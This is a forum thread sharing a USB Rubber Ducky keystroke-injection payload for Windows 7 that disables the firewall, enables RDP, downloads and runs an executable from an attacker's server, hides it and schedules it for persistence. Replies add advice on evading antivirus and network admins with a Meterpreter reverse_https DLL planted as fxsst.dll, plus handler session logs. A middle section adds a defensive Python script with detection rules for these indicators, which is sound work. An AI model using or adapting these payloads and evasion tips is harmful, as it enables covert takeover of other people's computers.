
[Payload] Persistent powershell reverse payload with UAC on Win7



This is a simple modification to the powershell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D

******************************************************************************************************************************

DELAY 5000
ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 700
ALT Y
DELAY 800
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"
ENTER
STRING exit
ENTER

******************************************************************************************************************************

You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above.

Then in terminal type the following 2 commands:

cd /usr/share/ducky/encoder

(for Kali, if using a different OS then cd to the directory your "encoder.jar" file is in)

java -jar encoder.jar -i payload.txt -o inject.bin

(now place the "inject.bin" file on your ducky and use as you normally would)

Edited by TeCHemically

Ok, I added a bit more to make persistence truly persistent. This now changes the attributes of the winmgmt.exe file to a hidden system file so it is not ordinarily visible. It also creates a scheduled task to run this every 2 hours in case connection is lost. If this task has already been run in the past it will replace the scheduled task with the name "Management".

DELAY 5000
ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 700
ALT Y
DELAY 800
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300

STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"
ENTER
DELAY 300
STRING attrib +H +S "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe"
ENTER
DELAY 300
STRING schtasks /create /tn Management /tr "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" /sc hourly /mo 2
ENTER
DELAY 300
STRING y
ENTER
STRING exit
ENTER

Edited by TeCHemically


This is great, but it would be wise to keep in mind that this is a very LOUD form of persistence. If you're running this on a network, then you need to be aware of any network admins that may be watching outgoing connections or just block all inbound rdp connections at the firewall level.

Thanks for the feedback! :) Are there any other ways for a persistent method that is quieter? How could one go about dropping a persistent reverse shell without the resulting connection being so noticeable? I try to make sure my listener is on a common port so it can get through the network firewall and it is working on the corporate network I have available for testing currently. Any guidance is appreciated, thanks again!


Well, to start, tunnelling anything over SSL is a great start. Have a look into Meterpreter in metasploit. The 64-bit https Meterpreter even as a binary will pretty much never be detected by an AV.

As far as persistence goes, the startup folder is one way, but is usually picked up by AV.

Or put Meterpreter into a dll file, call it "fxsst.dll" and throw it into C:\Windows. Windows automatically tries to load this dll on startup as part of the "Windows Picture and Fax" service.

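For the defensive side of this thread, here is an added example that is not from the thread, from simple-ducky or from Metasploit: a small Python triage script that flags the host-side indicators the payload posted earlier leaves behind (legacy netsh firewall disable, the Terminal Server registry edits, a download into the user's Startup folder, attrib +H +S on that file, a schtasks /create pointing at it) and the fxsst.dll drop into C:\Windows described in the reply above. The event records are constructed to imitate process-creation and file-creation events (the command-line and path fields a Windows 4688 or Sysmon-style event carries); the rule names, host names, user names and the URL are assumptions made for the example.

```python
"""Triage constructed process/file events for the persistence indicators discussed in this thread.

Assumptions: events are dicts with "host", "kind" ("process" or "file"), "user" and "data"
(command line for process events, full path for file events). Rule names are invented here.
"""
import re

# (rule name, event kind, case-insensitive regex on the event's "data" field)
RULES = [
    # netsh firewall set opmode disable  -> host firewall switched off with the legacy netsh syntax
    ("firewall_disabled_netsh", "process",
     r"netsh\s+firewall\s+set\s+opmode\s+disable"),
    # reg add ...Terminal Server /v fDenyTSConnections /d 0  -> inbound RDP enabled
    ("rdp_enabled_via_reg", "process",
     r"reg\s+add\s+.*Terminal Server.*fDenyTSConnections.*/d\s+0"),
    # reg add ...Terminal Server /v fAllowToGetHelp /d 1  -> Remote Assistance enabled
    ("remote_assistance_enabled", "process",
     r"reg\s+add\s+.*Terminal Server.*fAllowToGetHelp.*/d\s+1"),
    # PowerShell WebClient download whose destination is the per-user Startup folder
    ("download_to_startup_folder", "process",
     r"DownloadFile\(.*Start Menu\\Programs\\Startup"),
    # attrib +H / +S applied to something in the Startup folder (hiding the dropped file)
    ("startup_file_hidden_system", "process",
     r"attrib\s+.*\+[HS].*Start Menu\\Programs\\Startup"),
    # scheduled task whose action runs a binary out of the Startup folder
    ("schtask_runs_from_startup", "process",
     r"schtasks\s+/create\s+.*/tr\s+.*Start Menu\\Programs\\Startup"),
    # a file named fxsst.dll created directly in C:\Windows (search-order DLL load on boot)
    ("fxsst_dll_in_windows_dir", "file",
     r"^C:\\Windows\\fxsst\.dll$"),
]
COMPILED = [(name, kind, re.compile(rx, re.IGNORECASE)) for name, kind, rx in RULES]

# Constructed sample events (not real logs). WS07 shows the full chain, WS12 only the DLL drop,
# WS03 shows benign look-alikes that must not trip any rule.
STARTUP = "C:\\Users\\alice\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup"
SAMPLE_EVENTS = [
    {"host": "WS07", "kind": "process", "user": "alice",
     "data": "netsh firewall set opmode disable"},
    {"host": "WS07", "kind": "process", "user": "alice",
     "data": 'reg add "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server" '
             "/v fDenyTSConnections /t REG_DWORD /d 0 /f"},
    {"host": "WS07", "kind": "process", "user": "alice",
     "data": "powershell (new-object System.Net.WebClient).DownloadFile("
             "'http://example.invalid/winmgmt.txt','" + STARTUP + "\\winmgmt.exe')"},
    {"host": "WS07", "kind": "process", "user": "alice",
     "data": 'attrib +H +S "' + STARTUP + '\\winmgmt.exe"'},
    {"host": "WS07", "kind": "process", "user": "alice",
     "data": 'schtasks /create /tn Management /tr "' + STARTUP + '\\winmgmt.exe" /sc hourly /mo 2'},
    {"host": "WS12", "kind": "file", "user": "SYSTEM", "data": "C:\\Windows\\fxsst.dll"},
    {"host": "WS03", "kind": "process", "user": "bob", "data": "attrib +R C:\\Users\\bob\\notes.txt"},
    {"host": "WS03", "kind": "file", "user": "bob", "data": "C:\\Windows\\Temp\\fxsst.dll.bak"},
]


def match_event(event):
    """Return the names of every rule this single event trips (possibly none)."""
    return [name for name, kind, rx in COMPILED
            if kind == event["kind"] and rx.search(event["data"])]


def triage(events):
    """Collect distinct hits per host and grade them.

    One indicator alone is only "suspicious" (attrib or a scheduled task can be legitimate);
    three or more distinct indicators on the same host are the chain this thread's payload
    performs, so the host is graded "persistence_chain".
    """
    per_host = {}
    for ev in events:
        per_host.setdefault(ev["host"], set()).update(match_event(ev))
    report = {}
    for host, hits in per_host.items():
        if len(hits) >= 3:
            verdict = "persistence_chain"
        elif hits:
            verdict = "suspicious"
        else:
            verdict = "clean"
        report[host] = {"verdict": verdict, "hits": sorted(hits)}
    return report


if __name__ == "__main__":
    for host, result in sorted(triage(SAMPLE_EVENTS).items()):
        print(host, result["verdict"], ", ".join(result["hits"]) or "-")
```

Run over the constructed events, WS07 is graded as the full chain, WS12 as suspicious for the lone DLL drop, and WS03 stays clean. Feeding it real data means mapping your process-creation and file-creation telemetry onto the same four fields; the rules key on the exact commands this thread shows, so they are a starting point, not a complete signature set.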

Thanks for the help! :) Can the 64bit https meterpreter shell run on a 32 bit machine? Also, I generated the above mentioned dll via msfconsole but the command I used just allowed me to specify https. Is this created 64 bit by default or is there a part of the command I missed that will create the 64 bit shell? Thanks again, this is a great method!


You can't run a 64-Bit executable on a 32-Bit machine, but you can do it the other way. (x86 Meterpreter works on x86 and x64 architectures, but x86 detection rate is A LOT higher than 64-Bit)

The x86 Meterpreter reverse_https is here:

payload/windows/meterpreter/reverse_https (The one I expect you used)

The x64 one is here:

payload/windows/x64/meterpreter/reverse_https

Also, try and use msfvenom for generating payloads, it's a combination of msfpayload and msfencode.


You are quite right about everything you said. Thank you for your help; you have been a HUGE blessing! :D


Correct, except only one windows on the 4th line.

set PAYLOAD windows/x64/meterpreter/reverse_https

Keep in mind, that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https, doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious - best to pick something that will blend in with the other network traffic (at least as long as ports are concerned)).


Great, thanks so much! :D


I am having issues with msfvenom though. Using msfpayload and piping into msfencode worked to create the aforementioned dll but I don't see the options I need in the help of msfvenom.


Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically!

~skysploit


Beautiful, great work man! I just watched your vid. You have yourself another subscriber.


So, I have to ask. Since you have "I remember" playing on that vid. Do you recognize my avatar?


If msfvenom isn't working for you, then piping msfpayload into msfencode is still fine. It's what everyone did before msfvenom was released.

I used msfvenom and it gave me the output of my custom shellcode. How difficult is it to implement that into a custom exe / exe template that I can use for AV evasion? I have a thread on this started under security; if you could shed some light that would be amazing, thanks for all your help! :)

I started the 32 bit listener and created the fxsst.dll with a 32bit reverse_https payload. When it runs I get the following on my listening machine:

Starting the payload handler...
[*] <IP address>:5465 Request received for /JuQL...
[*] <IP address>:5465 Staging connection for target /JuQL received...
[*] Patched user-agent at offset 657384...
[*] Patched transport at offset 657044...
[*] Patched URL at offset 657112...
[*] Patched Expiration Timeout at offset 657868...
[*] Patched Communication Timeout at offset 657984...
[*] Meterpreter session 1 opened (<IP address>:443 -> <IP address>:5465) at 2013-10-04 13:47:46 -0500
[-] Failed to load extension: No response was received to the core_loadlib request.

Edited by TeCHemically

Tried it again and I get the following. It is acting like the shell is there but I cannot interact at all. In fact the shell is acting like it is on the perimeter not the host behind the public IP. I usually see the public IP then the internal host when I use reverse_tcp. In this method I get the shell functioning and on the internal client PC. Does the reverse_https payload require something else? Is it not pulling down the stage? Does this payload behave differently than reverse_tcp?

exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Starting the payload handler...
[*] <Public IP address>:60476 Request received for /JuQL...
[*] <Public IP address>:60476 Staging connection for target /JuQL received...
[*] Patched user-agent at offset 657384...
[*] Patched transport at offset 657044...
[*] Patched URL at offset 657112...
[*] Patched Expiration Timeout at offset 657868...
[*] Patched Communication Timeout at offset 657984...
[*] Meterpreter session 1 opened (<IP address>:443 -> <Public IP address>:60476) at 2013-10-04 17:21:11 -0500


WOW, just...WOW man...the new simple-ducky is freaking BEAUTIFUL!!! Amazing work Skysploit; a true inspiration! Way to go and THANK YOU! :D :D
